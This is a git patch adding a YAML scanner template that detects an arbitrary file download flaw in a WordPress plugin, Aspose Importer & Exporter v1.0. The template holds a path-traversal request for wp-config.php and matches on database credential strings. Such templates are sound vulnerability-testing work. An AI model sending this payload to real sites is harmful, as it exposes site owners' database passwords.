From 3400cfff5e6707b4030b022968e39971a53aa5dc Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 22 Oct 2021 08:41:10 +0900 Subject: [PATCH] Create aspose-importer-exporter-file-download.yaml --- aspose-importer-exporter-file-download.yaml | 29 +++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 aspose-importer-exporter-file-download.yaml diff --git a/aspose-importer-exporter-file-download.yaml b/aspose-importer-exporter-file-download.yaml new file mode 100644 index 0000000000..0216e21bf1 --- /dev/null +++ b/aspose-importer-exporter-file-download.yaml @@ -0,0 +1,29 @@ +id: aspose-importer-exporter-file-download + +info: + name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download + author: 0x_Akoko + severity: high + description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + reference: + - https://packetstormsecurity.com/files/131162/ + - https://wordpress.org/plugins/aspose-importer-exporter + tags: wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200